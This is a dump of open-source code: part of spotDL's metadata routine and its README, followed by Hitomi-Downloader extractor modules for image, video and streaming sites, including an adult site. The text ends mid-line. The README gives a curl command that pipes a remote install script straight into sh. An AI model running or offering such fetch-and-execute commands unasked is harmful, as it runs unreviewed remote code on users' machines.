Same as above if ( not song_meta or None in [ song_meta.get("name"), song_meta.get("album_art"), song_meta.get("artist"), song_meta.get("artists"), song_meta.get("track_number"), ] or downloader.settings["force_update_metadata"] ): # Song does not have metadata, or it is missing some fields # or we are forcing update of metadata # so we search for it logger.debug("Searching metadata for %s", file.name) search_results = get_search_results(file.stem) if not search_results: logger.error("Could not find metadata for %s", file.name) return None song = search_results[0] else: # Song has metadata, so we use it to reinitialize the song object # and fill in the missing metadata try: song = reinit_song(Song.from_missing_data(**song_meta)) except QueryError: logger.error("Could not find metadata for %s", file.name) return None # Check if the song has lyric # if not use downloader to find lyrics if song_meta is None or song_meta.get("lyrics") is None: logger.debug("Fetching lyrics for %s", song.display_name) song.lyrics = downloader.search_lyrics(song) if song.lyrics: logger.info("Found lyrics for song: %s", song.display_name) else: song.lyrics = song_meta.get("lyrics") # Apply metadata to the song embed_metadata(file, song, skip_album_art=downloader.settings["skip_album_art"]) logger.info("Applied metadata to %s", file.name) if downloader.settings["generate_lrc"]: lrc_file = file.with_suffix(".lrc") if lrc_file.exists(): logger.info("Lrc file already exists for %s", file.name) return None generate_lrc(song, file) if lrc_file.exists(): logger.info("Saved lrc file for %s", song.display_name) else: logger.info("Could not find lrc file for %s", song.display_name) return None async def pool_worker(file_path: Path) -> None: async with downloader.semaphore: # The following function calls blocking code, which would block whole event loop. # Therefore it has to be called in a separate thread via ThreadPoolExecutor. This # is not a problem, since GIL is released for the I/O operations, so it shouldn't # hurt performance. await downloader.loop.run_in_executor(None, process_file, file_path) tasks = [pool_worker(path) for path in paths] # call all task asynchronously, and wait until all are finished downloader.loop.run_until_complete(asyncio.gather(*tasks)) # to re-download the local songs if downloader.settings["redownload"]: songs_url: List[str] = [] for file in paths: meta_data = get_file_metadata( Path(file), downloader.settings["id3_separator"] ) if meta_data and meta_data["url"]: songs_url.append(meta_data["url"]) songs_list = parse_query( query=songs_url, threads=downloader.settings["threads"], use_ytm_data=downloader.settings["ytm_data"], playlist_numbering=downloader.settings["playlist_numbering"], album_type=downloader.settings["album_type"], ) downloader.download_multiple_songs(songs_list)
<!--- mdformat-toc start --slug=github ---> <!--- !!! IF EDITING THE README, ENSURE TO COPY THE WHOLE FILE TO index.md in `/docs/` AND REMOVE THE REFERENCES TO ReadTheDocs THERE. ---> <div align="center"> # spotDL v4 **spotDL** finds songs from Spotify playlists on YouTube and downloads them - along with album art, lyrics and metadata. [![MIT License](https://img.shields.io/github/license/spotdl/spotify-downloader?color=44CC11&style=flat-square)](https://github.com/spotDL/spotify-downloader/blob/master/LICENSE) [![PyPI version](https://img.shields.io/pypi/pyversions/spotDL?color=%2344CC11&style=flat-square)](https://pypi.org/project/spotdl/) [![PyPi downloads](https://img.shields.io/pypi/dw/spotDL?label=downloads@pypi&color=344CC11&style=flat-square)](https://pypi.org/project/spotdl/) ![Contributors](https://img.shields.io/github/contributors/spotDL/spotify-downloader?style=flat-square) [![Discord](https://img.shields.io/discord/771628785447337985?label=discord&logo=discord&style=flat-square)](https://discord.gg/xCa23pwJWY) > spotDL: The fastest, easiest and most accurate command-line music downloader. </div> ______________________________________________________________________ **[Read the documentation on ReadTheDocs!](https://spotdl.readthedocs.io)** ______________________________________________________________________ ## Installation Refer to our [Installation Guide](https://spotdl.rtfd.io/en/latest/installation/) for more details. ### Python (Recommended Method) - _spotDL_ can be installed by running `pip install spotdl`. - To update spotDL run `pip install --upgrade spotdl` > On some systems you might have to change `pip` to `pip3`. <details> <summary style="font-size:1.25em"><strong>Other options</strong></summary> - Prebuilt executable - You can download the latest version from the [Releases Tab](https://github.com/spotDL/spotify-downloader/releases) - On Termux - `curl -L https://raw.githubusercontent.com/spotDL/spotify-downloader/master/scripts/termux.sh | sh` - Arch - There is an [Arch User Repository (AUR) package](https://aur.archlinux.org/packages/python-spotdl/) for spotDL. - Docker - Build image: ```bash docker build -t spotdl . ``` - Launch container with spotDL parameters (see section below). You need to create mapped volume to access song files ```bash docker run --rm -v $(pwd):/music spotdl download [trackUrl] ``` - Build from source ```bash git clone https://github.com/spotDL/spotify-downloader && cd spotify-downloader pip install poetry poetry install poetry run python3 scripts/build.py ``` An executable is created in `spotify-downloader/dist/`. </details> ### Installing FFmpeg FFmpeg is required for spotDL. If using FFmpeg only for spotDL, you can simply install FFmpeg to your spotDL installation directory: `spotdl --download-ffmpeg` We recommend the above option, but if you want to install FFmpeg system-wide, follow these instructions - [Windows Tutorial](https://windowsloop.com/install-ffmpeg-windows-10/) - OSX - `brew install ffmpeg` - Linux - `sudo apt install ffmpeg` or use your distro's package manager ## Usage Using SpotDL without options:: ```sh spotdl [urls] ``` You can run _spotDL_ as a package if running it as a script doesn't work: ```sh python -m spotdl [urls] ``` General usage: ```sh spotdl [operation] [options] QUERY ``` There are different **operations** spotDL can perform. The *default* is `download`, which simply downloads the songs from YouTube and embeds metadata. The **query** for spotDL is usually a list of Spotify URLs, but for some operations like **sync**, only a single link or file is required. For a list of all **options** use ```spotdl -h``` <details> <summary style="font-size:1em"><strong>Supported operations</strong></summary> - `save`: Saves only the metadata from Spotify without downloading anything. - Usage: `spotdl save [query] --save-file {filename}.spotdl` - `web`: Starts a web interface instead of using the command line. However, it has limited features and only supports downloading single songs. - `url`: Get direct download link for each song from the query. - Usage: `spotdl url [query]` - `sync`: Updates directories. Compares the directory with the current state of the playlist. Newly added songs will be downloaded and removed songs will be deleted. No other songs will be downloaded and no other files will be deleted. - Usage: `spotdl sync [query] --save-file {filename}.spotdl` This create a new **sync** file, to update the directory in the future, use: `spotdl sync {filename}.spotdl` - `meta`: Updates metadata for the provided song files. </details> ## Music Sourcing and Audio Quality spotDL uses YouTube as a source for music downloads. This method is used to avoid any issues related to downloading music from Spotify. > **Note** > Users are responsible for their actions and potential legal consequences. We do not support unauthorized downloading of copyrighted material and take no responsibility for user actions. ### Audio Quality spotDL downloads music from YouTube and is designed to always download the highest possible bitrate; which is 128 kbps for regular users and 256 kbps for YouTube Music premium users. Check the [Audio Formats](docs/usage.md#audio-formats-and-quality) page for more info. ## Contributing Interested in contributing? Check out our [CONTRIBUTING.md](docs/CONTRIBUTING.md) to find resources around contributing along with a guide on how to set up a development environment. #### Join our amazing community as a code contributor, and help accelerate <br><br> <a href="https://github.com/spotDL/spotify-downloader/graphs/contributors"> <img class="dark-light" src="https://contrib.rocks/image?repo=spotDL/spotify-downloader&anon=0&columns=25&max=100&r=true" /> </a> ## Donate help support the development and maintenance of the software ❤️ [![paypal](https://img.shields.io/badge/paypal-%2300457C.svg?&style=for-the-badge&logo=paypal&logoColor=white)](https://paypal.me/kko7) [![kofi](https://img.shields.io/badge/kofi-%23F16061.svg?&style=for-the-badge&logo=ko-fi&logoColor=white)](https://ko-fi.com/xnetcat) ## License This project is Licensed under the [MIT](/LICENSE) License.
Hitomi-Downloader
c6dc4c421d0e3986936ad740073c3ee52e226c1f
File: src/extractor/danbooru_downloader.py #coding: utf-8 import downloader import ree as re from utils import Downloader, get_max_range, clean_title, get_print, try_n, urljoin, check_alive, LazyUrl, get_ext, limits from translator import tr_ from urllib.parse import urlparse, parse_qs, quote import clf2 class Downloader_danbooru(Downloader): type = 'danbooru' URLS = ['danbooru.donmai.us'] MAX_CORE = 6 _name = None ACCEPT_COOKIES = [r'(.*\.)?donmai\.us'] def init(self): self.session = clf2.solve(self.url, cw=self.cw)['session'] #5336 @classmethod def fix_url(cls, url): if 'donmai.us' in url: url = url.replace('http://', 'https://') else: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = f'https://danbooru.donmai.us/posts?tags={quote(url)}' if 'donmai.us/posts/' in url: url = url.split('?')[0] return url.strip('+') @property def name(self): if self._name is None: parsed_url = urlparse(self.url) qs = parse_qs(parsed_url.query) if 'donmai.us/favorites' in self.url: id = qs.get('user_id', [''])[0] print('len(id) =', len(id), f'"{id}"') if not id: raise AssertionError('[Fav] User id is not specified') id = f'fav_{id}' elif 'donmai.us/explore/posts/popular' in self.url: #4160 soup = read_soup(self.url, self.session, self.cw) id = soup.find('h1').text elif 'donmai.us/posts/' in self.url: id = re.find(r'donmai\.us/posts/([0-9]+)', self.url, err='no id') else: tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' self._name = id return clean_title(self._name) def read(self): self.title = self.name if 'donmai.us/posts/' in self.url: self.single = True imgs = get_imgs(self.url, self.session, self.name, cw=self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name class Image: def __init__(self, id, url, session, cw): self._cw = cw self.id = id self._session = session self.url = LazyUrl(url, self.get, self) def get(self, url): soup = read_soup(url, self._session, self._cw) ori = soup.find('li', id='post-option-view-original') if ori: img = ori.find('a')['href'] else: img = soup.find('li', id='post-info-size').find('a')['href'] if get_ext(img) == '.zip': #4635 img = soup.find('section', id='content').find('video')['src'] img = urljoin(url, img) ext = get_ext(img) self.filename = f'{self.id}{ext}' return img, None @limits(.5) def wait(cw): check_alive(cw) def setPage(url, page): # Main page if re.findall(r'https://[\w]*[.]?donmai.us/?$', url): url = f"https://{'danbooru.' if 'danbooru.' in url else ''}donmai.us/posts?page=1" # Change the page if 'page=' in url: url = re.sub('page=[0-9]*', f'page={page}', url) else: url += f'&page={page}' return url @try_n(12) #4103 def read_soup(url, session, cw, try_=1): check_alive(cw) wait(cw) if try_ > 1: session.headers['User-Agent'] = downloader.ua.random #5730 return downloader.read_soup(url, session=session) def get_imgs(url, session, title=None, range_=None, cw=None): if 'donmai.us/artists' in url: raise NotImplementedError() if 'donmai.us/posts/' in url: id = re.find(r'donmai\.us/posts/([0-9]+)', url, err='no id') img = Image(id, url, session, cw) return [img] print_ = get_print(cw) # Range max_pid = get_max_range(cw) if range_ is None: range_ = range(1, 1001) print(range_) imgs = [] i = 0 empty_count = 0 empty_count_global = 0 url_imgs = set() while i < len(range_): check_alive(cw) p = range_[i] url = setPage(url, p) print_(url) soup = read_soup(url, session, cw) articles = soup.findAll('article') if articles: empty_count_global = 0 else: empty_count += 1 if empty_count < 4: s = f'empty page; retry... {p}' print_(s) continue else: empty_count = 0 empty_count_global += 1 if empty_count_global >= 6: break for article in articles: id = article.attrs['data-id'] #url_img = article.attrs['data-file-url'].strip() url_img = urljoin(url, article.find('a', class_='post-preview-link')['href']) #4160 #print(url_img) if url_img not in url_imgs: url_imgs.add(url_img) img = Image(id, url_img, session, cw) imgs.append(img) if len(imgs) >= max_pid: break if cw is not None: cw.setTitle(f'{tr_("읽는 중...")} {title} - {len(imgs)}') i += 1 return imgs[:max_pid] File: src/extractor/gelbooru_downloader.py #coding: utf-8 import downloader import ree as re from utils import Downloader, urljoin, query_url, get_max_range, get_print, get_ext, clean_title, Session, check_alive, File, clean_url from translator import tr_ from urllib.parse import quote import utils def get_tags(url): url = clean_url(url) qs = query_url(url) if 'page=favorites' in url: id = qs.get('id', ['N/A'])[0] id = 'fav_{}'.format(id) else: tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' return id class Downloader_gelbooru(Downloader): type = 'gelbooru' URLS = ['gelbooru.com'] MAX_CORE = 8 _name = None ACCEPT_COOKIES = [r'(.*\.)?gelbooru\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): if 'gelbooru.com' in url.lower(): url = url.replace('http://', 'https://') else: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = quote(url) url = url.replace('%2B', '+') url = 'https://gelbooru.com/index.php?page=post&s=list&tags={}'.format(url) return url @property def name(self): if self._name is None: tags = get_tags(self.url) self._name = tags return clean_title(self._name) def read(self): self.title = self.name self.urls += get_imgs(self.url, self.session, self.name, cw=self.cw) self.title = self.name class File_gelbooru(File): type = 'gelbooru' format = 'id' def get(self): soup = downloader.read_soup(self['referer'], session=self.session) for li in soup.findAll('li'): if li.text.strip() == 'Original image': break else: raise Exception('no Original image') url = li.find('a')['href'] d = { 'id': self['id'], } return {'url': url, 'name': utils.format('gelbooru', d, get_ext(url))} def alter(self): return self.get()['url'] def setPage(url, page): if 'pid=' in url: url = re.sub('pid=[0-9]*', f'pid={page}', url) else: url += f'&pid={page}' if page == 0: url = url.replace('&pid=0', '') return url def get_imgs(url, session, title=None, cw=None): print_ = get_print(cw) url = clean_url(url) if 's=view' in url and 'page=favorites' not in url: raise NotImplementedError('Not Implemented') tags = get_tags(url) tags = quote(tags, safe='/') tags = tags.replace('%20', '+') url = f'https://gelbooru.com/index.php?page=post&s=list&tags={tags}' # 2566 user_id = session.cookies.get('user_id', domain='gelbooru.com') if not user_id: cookies = {'fringeBenefits': 'yup'} session.cookies.update(cookies) print_('user_id: {}'.format(user_id)) # Range max_pid = get_max_range(cw) imgs = [] ids = set() count_no_imgs = 0 for p in range(500): #1017 check_alive(cw) url = setPage(url, len(ids)) print_(url) soup = downloader.read_soup(url, session=session) posts = soup.findAll(class_='thumbnail-preview') imgs_new = [] for post in posts: id_ = int(re.find('[0-9]+', post.find('a')['id'], err='no id')) if id_ in ids: print('duplicate:', id_) continue ids.add(id_) url_img = urljoin(url, post.find('a')['href']) img = File_gelbooru({'id': id_, 'referer': url_img, 'name_hint': f'{id_}{{ext}}'}) imgs_new.append(img) if imgs_new: imgs += imgs_new count_no_imgs = 0 else: print('no imgs') count_no_imgs += 1 if count_no_imgs > 1: print('break') break if len(imgs) >= max_pid: break if cw is not None: cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs))) return imgs[:max_pid] File: src/extractor/youporn_downloader.py import downloader from io import BytesIO from utils import Downloader, LazyUrl, get_ext, format_filename, try_n import ytdl from m3u8_tools import M3u8_stream class Downloader_youporn(Downloader): type = 'youporn' single = True URLS = ['youporn.com'] display_name = 'YouPorn' ACCEPT_COOKIES = [r'(.*\.)?youporn\.com'] @classmethod def fix_url(cls, url): if 'youporn.com' not in url.lower(): url = 'https://www.youporn.com/watch/{}'.format(url) return url def read(self): video = Video(self.url, cw=self.cw) self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: @try_n(4) def __init__(self, url, cw=None): ydl = ytdl.YoutubeDL(cw=cw) info = ydl.extract_info(url) f = info['formats'][-1] url_video = f['url'] ext = get_ext(url_video) if ext.lower() == '.m3u8': #6142 ext = '.mp4' url_video = M3u8_stream(url_video, referer=url) self.url = LazyUrl(url, lambda _: url_video, self) self.url_thumb = info['thumbnails'][0]['url'] self.thumb = BytesIO() downloader.download(self.url_thumb, buffer=self.thumb) self.title = info['title'] self.filename = format_filename(self.title, info['id'], ext) File: src/extractor/m3u8_downloader.py from utils import Downloader, LazyUrl, clean_title, Session, get_ext import utils from m3u8_tools import playlist2stream, M3u8_stream import os from hashlib import md5 from translator import tr_ DEFAULT_N_THREAD = 2 def suitable(url): ext = get_ext(url).lower() return ext in ('.m3u8', '.mpd') class Downloader_m3u8(Downloader): type = 'm3u8' URLS = [suitable] single = True display_name = 'M3U8' @classmethod def fix_url(cls, url): if '://' not in url: url = 'http://' + url return url def read(self): fmt = self.cw.format referer = self.url if isinstance(fmt, str) and fmt.startswith('referer:'): referer = fmt[len('referer:'):] self.print_('referer: {}'.format(referer)) n_thread = DEFAULT_N_THREAD if isinstance(fmt, int) and fmt > 0: n_thread = fmt self.print_('n_thread: {}'.format(n_thread)) video = Video(self.url, n_thread, referer) self.urls.append(video.url) self.title = os.path.splitext(os.path.basename(video.filename))[0].replace(b'\xef\xbc\x9a'.decode('utf8'), ':') class Video: def __init__(self, url, n_thread, referer): session = Session() session.purge([rf'(.*\.)?{utils.domain(url)}']) if get_ext(url).lower() == '.mpd': def m(): hdr = session.headers.copy() if referer: hdr['Referer'] = referer return utils.LiveStream(url, headers=hdr) ms = [m] else: ms = [ lambda: playlist2stream(url, n_thread=n_thread, session=session), lambda: M3u8_stream(url, n_thread=n_thread, session=session), ] for m in ms: try: m = m() break except Exception as e: e_ = e else: raise e_ if getattr(m, 'live', None) is not None: #5110 #m = m.live hdr = session.headers.copy() if referer: hdr['Referer'] = referer m = utils.LiveStream(url, headers=hdr) live = True else: live = False self.url = LazyUrl(url, lambda _: m, self) self.title = os.path.splitext(os.path.basename(url).split('?')[0])[0][:50] self.id_ = md5(url.encode('utf8')).hexdigest()[:8] tail = f' ({self.id_}).mp4' if live: #5110 from datetime import datetime tail = ' ' + clean_title(datetime.now().strftime('%Y-%m-%d %H:%M')) + tail self.filename = clean_title(self.title, n=-len(tail)) + tail import selector @selector.options('m3u8') def options(urls): def f(urls): n_thread, ok = utils.QInputDialog.getInt(Downloader.mainWindow, tr_('Set number of threads'), tr_('Number of threads?'), value=DEFAULT_N_THREAD, min=1, max=4, step=1) if not ok: return return n_thread def f2(urls): referer, ok = utils.QInputDialog.getText(Downloader.mainWindow, tr_('Set a referer'), tr_('Referer?')) if not ok: return return 'referer:'+referer return [ {'text': 'Set the number of threads...', 'format': f}, {'text': 'Set the referer...', 'format': f2}, ] File: src/extractor/afreeca_downloader.py import downloader from utils import Soup, Downloader, Session, try_n, format_filename, cut_pair, File, get_print, print_error, json import ree as re from io import BytesIO from m3u8_tools import playlist2stream, M3u8_stream import errors import utils import os class LoginRequired(errors.LoginRequired): def __init__(self, *args): super().__init__(*args, method='browser', url='https://login.afreecatv.com/afreeca/login.php') class Downloader_afreeca(Downloader): type = 'afreeca' URLS = ['afreecatv.com'] single = True display_name = 'AfreecaTV' ACCEPT_COOKIES = [r'(.*\.)?afreecatv\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): if Live_afreeca.is_live(url): url = Live_afreeca.fix_url(url) return url.rstrip(' /') def read(self): video = Video({'referer': self.url}) video.ready(self.cw) self.urls.append(video) thumb = BytesIO() downloader.download(video['url_thumb'], buffer=thumb) self.setIcon(thumb) self.title = os.path.splitext(video['name'])[0].replace(':', ':') self.artist = video['artist'] if video['live']: d = {} d['url'] = self.url d['title'] = self.artist d['thumb'] = thumb.getvalue() utils.update_live(d, self.cw) @try_n(4) def _get_stream(url_m3u8, session, referer, cw=None): print_ = get_print(cw) print_(f'_get_stream: {url_m3u8}') try: stream = playlist2stream(url_m3u8, referer=referer, session=session) except Exception as e: print_(print_error(e)) stream = M3u8_stream(url_m3u8, referer=referer, session=session) return stream class Video(File): type = 'afreeca' _live_info = None def get(self): print_ = get_print(self.cw) url, session = self['referer'], self.session if session is None: session = Session() session.purge('afreeca') html = downloader.read_html(url, session=session) if "document.location.href='https://login." in html: raise LoginRequired() if len(html) < 2000: alert = re.find(r'''alert\(['"](.+?)['"]\)''', html) if alert: raise LoginRequired(alert) soup = Soup(html) url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] print_('url_thumb: {}'.format(url_thumb)) vid = re.find('/player/([0-9]+)', url) if vid is None: # live bid = re.find('afreecatv.com/([^/]+)', url, err='no bid') url_api = f'https://st.afreecatv.com/api/get_station_status.php?szBjId={bid}' r = session.post(url_api, headers={'Referer': url}) d = json.loads(r.text) artist = d['DATA']['user_nick'] if self._live_info is not None: self._live_info['title'] = artist url_api = f'https://live.afreecatv.com/afreeca/player_live_api.php?bjid={bid}' #bno = re.find('afreecatv.com/[^/]+/([0-9]+)', url, err='no bno') bno = re.find(r'nBroadNo\s=\s([0-9]+)', html, err='no bno') #6915 r = session.post(url_api, data={'bid': bid, 'bno': bno, 'type': 'aid', 'pwd': '', 'player_type': 'html5', 'stream_type': 'common', 'quality': 'master', 'mode': 'landing', 'from_api': '0'}, headers={'Referer': url}) d = json.loads(r.text) res = d['CHANNEL'].get('RESULT') print_(f'result: {res}') if res == -6: raise LoginRequired() aid = d['CHANNEL']['AID'] data = {} data['title'] = soup.find('meta', {'property': 'og:title'})['content'].strip() data['files'] = [{'file': f'https://pc-web.stream.afreecatv.com/live-stm-16/auth_master_playlist.m3u8?aid={aid}'}] data['writer_nick'] = artist data['live'] = True elif f'{vid}/catch' in url: #6215 url_api = 'https://api.m.afreecatv.com/station/video/a/catchview' r = session.post(url_api, data={'nPageNo': '1', 'nLimit': '10', 'nTitleNo': vid}, headers={'Referer': url}) try: s = cut_pair(r.text) d = json.loads(s) except Exception as e: print_(r.text) raise e data = d['data'][0] else: url_api = 'https://api.m.afreecatv.com/station/video/a/view' r = session.post(url_api, data={'nTitleNo': vid, 'nApiLevel': '10', 'nPlaylistIdx': '0'}, headers={'Referer': url}) try: s = cut_pair(r.text) d = json.loads(s) except Exception as e: print_(r.text) raise e data = d['data'] title = data.get('full_title') or data['title'] artist = data.get('copyright_nickname') or data.get('original_user_nick') or data['writer_nick'] if data.get('adult_status') == 'notLogin': raise LoginRequired(title) urls_m3u8 = [] for file in data['files']: if file.get('quality_info'): file = file['quality_info'][0]['file'] else: file = file['file'] urls_m3u8.append(file) print_(f'urls_m3u8: {len(urls_m3u8)}') if data.get('live'): hdr = session.headers.copy() hdr['Referer'] = url stream = utils.LiveStream(urls_m3u8[0], headers=hdr, cw=self.cw) else: streams = [] for url_m3u8 in urls_m3u8: try: stream = _get_stream(url_m3u8, session, url, cw=self.cw) except Exception as e: print_(print_error(e)) continue #2193 streams.append(stream) for stream in streams[1:]: streams[0] += stream stream = streams[0] live = data.get('live') or False return {'url': stream, 'title': title, 'name': format_filename(title, vid, '.mp4', artist=artist, live=live), 'url_thumb': url_thumb, 'artist': artist, 'live': live} class Live_afreeca(utils.Live): type = 'afreeca' @classmethod def is_live(cls, url): return bool(re.match(r'https?://(play|bj).afreecatv.com/([^/?#]+)', url)) and url.strip('/').count('/') <= 4 @classmethod def fix_url(cls, url): bj = re.find(r'https?://(play|bj).afreecatv.com/([^/?#]+)', url)[1] return f'https://play.afreecatv.com/{bj}' @classmethod def check_live(cls, url, info=None): try: video = Video({'referer': url}) video._live_info = info video.ready(None) return True except Exception as e: print(e) return False File: src/extractor/naverpost_downloader.py # coding: UTF-8 # title: Download naver post image # author: SaidBySolo # comment: 네이버 포스트의 이미지를 다운로드합니다 """ MIT License Copyright (c) 2020 SaidBySolo Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import codecs import json import re from distutils.util import strtobool from typing import Any, Iterator, List from urllib.parse import ParseResult, urlparse, parse_qs import requests from bs4 import BeautifulSoup import clf2 import page_selector from utils import Downloader, Soup, clean_title class Page: def __init__(self, title, url) -> None: self.title = clean_title(title) self.url = url class DownloaderNaverPost(Downloader): type = "naverpost" # 타입 URLS = ["m.post.naver.com", "post.naver.com"] def init(self) -> None: self.parsed_url = urlparse(self.url) # url 나눔 self.soup = get_soup(self.url) @property def client(self): return Client(self.parsed_url, self.soup) def read(self): if self.client.single: self.title = self.client.title posts = self.client.posts else: raise NotImplementedError for img_link in img_src_generator(posts): self.urls.append(img_link) # https://github.com/KurtBestor/Hitomi-Downloader/blob/master/src/extractor/manatoki_downloader.py#L106 참고 @page_selector.register("naverpost") def f(url, win): client = Client(urlparse(url), get_soup(url, win=win)) return [ page for page_list in client.posts for page in page_list ] # 2차원 리스트 -> 1차원 리스트 # https://github.com/KurtBestor/Hitomi-Downloader/blob/master/src/extractor/manatoki_downloader.py#L84 참고 def get_soup(url: str, win=None) -> BeautifulSoup: res = clf2.solve(url, win=win) return Soup(res["html"]) # 페이지 파싱에서 사용되는 파서 def page_soup(url: str) -> BeautifulSoup: get_html_regex = re.compile(r"\"html\"\:(.+)(\n|\s)\}") response = requests.get(url) like_html = get_html_regex.search(response.text)[1] html = decode_escapes(like_html).replace(r"\/", "/") return Soup(html) # HTML5 data-* 속성이 사용됨. def get_img_data_linkdatas(soup: Any) -> Iterator[str]: a_elements = soup.find_all("a", {"data-linktype": "img"}) # 링크 타입이 img인것만 전부 찾음 for a_element in a_elements: yield a_element["data-linkdata"] def img_src_generator(linkdatas: Iterator[str]) -> Iterator[str]: for linkdata in linkdatas: data = json.loads(linkdata) if data.get("linkUse") is None: yield data["src"] # 제네레이터 else: if not strtobool(data["linkUse"]): yield data["src"] # https://stackoverflow.com/a/24519338 참고 def decode_escapes(like_html: str) -> str: escape_sequence_regex = re.compile( r""" ( \\U........ # 8-digit hex escapes | \\u.... # 4-digit hex escapes | \\x.. # 2-digit hex escapes | \\[0-7]{1,3} # Octal escapes | \\N\{[^}]+\} # Unicode characters by name | \\[\\'"abfnrtv] # Single-character escapes )""", re.UNICODE | re.VERBOSE, ) return escape_sequence_regex.sub( lambda match: codecs.decode(match.group(0)), like_html ) # 제목 class Title: def __init__(self, soup: Any): self.soup = soup def get_profile_title(self) -> str: profile_name = self.soup.find("p", class_="nick_name").find( "span", class_="name" ) # 프로필 닉네임 return clean_title(profile_name.text) # 닉네임으로만 def get_series_title(self) -> str: series_name = self.soup.find("h2", class_="tit_series").find( "span", class_="ell" ) # 시리즈 제목 author = self.soup.find("div", class_="series_author_wrap").find( "strong", class_="ell1" ) # 작성자 return clean_title(f"{series_name.text} ({author.text})") # 무난하게 붙임 def get_title(self) -> str: title = self.soup.find("h3", class_="se_textarea") # 포스트 제목 author = self.soup.find("span", class_="se_author") # 작성자 return clean_title(f"{title.text.replace(' ', '')} ({author.text})") # 무난하게 붙임 # 총 포스트 수 class Total: def __init__(self, soup: Any) -> None: self.soup = soup # 0: 팔로워 1: 팔로잉 2: 포스트 3: 좋아요한글 def get_total_post(self) -> int: profile_info = self.soup.find("div", class_="expert_num_info") # 프로필 정보 total_post_element = profile_info.find_all("li", class_="inner")[2] return int(total_post_element.find("span", class_="num").text) # 총몇개인지만 리턴 # 0: 포스트 1: 팔로워 def get_series_total_post(self) -> int: series_info = self.soup.find("div", class_="series_follow_area") # 시리즈 정보 total_post_element = series_info.find_all("a")[0] return int(total_post_element.find("em").text) # 총몇개인지만 리턴 class UrlGenerator: def __init__(self, parsed_url: ParseResult, total_count: int) -> None: self.parsed_url = parsed_url self.count = ( round(total_count / 20) + 1 if not (total_count / 20).is_integer() else round(total_count / 20) ) def all_post_url_generator(self) -> Iterator[str]: query = parse_qs(self.parsed_url.query) for i in range(self.count): new_url_query = f"?memberNo={query['memberNo'][0]}&fromNo={i + 1}" url = f"https://{self.parsed_url.netloc}/async{self.parsed_url.path}{new_url_query}" yield url def all_series_url_generator(self) -> Iterator[str]: query = parse_qs(self.parsed_url.query) for i in range(self.count): new_url_query = f"?memberNo={query['memberNo'][0]}&seriesNo={query['seriesNo'][0]}&fromNo={i + 1}" url = f"https://{self.parsed_url.netloc}/my/series/detail/more.nhn{new_url_query}" yield url # 여기서 페이지 리스트 만듬 class PostPage: def __init__(self, soup: Any): self.soup = soup def all_post_page_generator(self) -> Iterator[List[Page]]: titles = self.soup.find_all("strong", class_="tit_feed ell") link_elements = self.soup.find_all("a", class_="link_end", href=True) page = [ Page(title.text.replace(" ", ""), link_element["href"]) for link_element, title in zip(link_elements, titles) ] yield page[::-1] def all_series_page_generator(self) -> Iterator[List[Page]]: titles = [ element.find("span") for element in self.soup.find_all("div", class_="spot_post_name") ] link_elements = self.soup.find_all("a", class_="spot_post_area", href=True) page = [ Page(title.text.replace(" ", ""), link_element["href"]) for link_element, title in zip(link_elements, titles) ] yield page[::-1] # 필요한 클래스 전부 상속후 편하게 쓸수있게 만듬 class Client(Title, Total, UrlGenerator): def __init__(self, parsed_url: ParseResult, soup: BeautifulSoup): Title.__init__(self, soup) Total.__init__(self, soup) if parsed_url.path.startswith("/viewer"): self.title = self.get_title() self.posts = get_img_data_linkdatas(self.soup) self.single = True elif parsed_url.path.startswith("/my.nhn"): UrlGenerator.__init__(self, parsed_url, self.get_total_post()) self.title = self.get_profile_title() self.posts = self.all_post_url_generator() self.single = False elif parsed_url.path.startswith("/my/series"): UrlGenerator.__init__(self, parsed_url, self.get_series_total_post()) self.title = self.get_series_title() self.posts = self.all_series_url_generator() self.single = False else: raise Exception("유효하지 않습니다.") File: src/extractor/misskey_downloader.py from utils import Downloader, Session, clean_title, get_ext, check_alive, tr_, try_n, File, get_max_range, limits import downloader import ree as re from datetime import datetime import utils import errors DOMAIN = 'misskey.io' SUBFOLDER = True class File_misskey(File): type = 'misskey' format = '[date] id_ppage' def get_file(nid, url, referer, session, p, time): ext = get_ext(url) or downloader.get_ext(url, session, referer) d = { 'date': time, 'id': nid, 'page': p, } filename = utils.format('misskey', d, ext) info = {'name': filename, 'url': url, 'referer': referer} return File_misskey(info) def get_time(note): ds = note['createdAt'] time = datetime.strptime(ds.split('.')[0], '%Y-%m-%dT%H:%M:%S') time = (time-datetime(1970,1,1)).total_seconds() return time class Downloader_misskey(Downloader): type = 'misskey' URLS = [f'{DOMAIN}/notes/', f'{DOMAIN}/@'] display_name = 'Misskey' ACCEPT_COOKIES = [rf'(.*\.)?{DOMAIN}'] MAX_CORE = 8 @classmethod def fix_url(cls, url): if DOMAIN.lower() in url.lower() and '://' not in url: url = 'https://' + url if url.startswith('@'): url = f'https://{DOMAIN}/{url}' return url def init(self): self.session = Session() if f'{DOMAIN}/notes/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) @try_n(4, sleep=5) @limits(2) def call(self, path, payload): token = 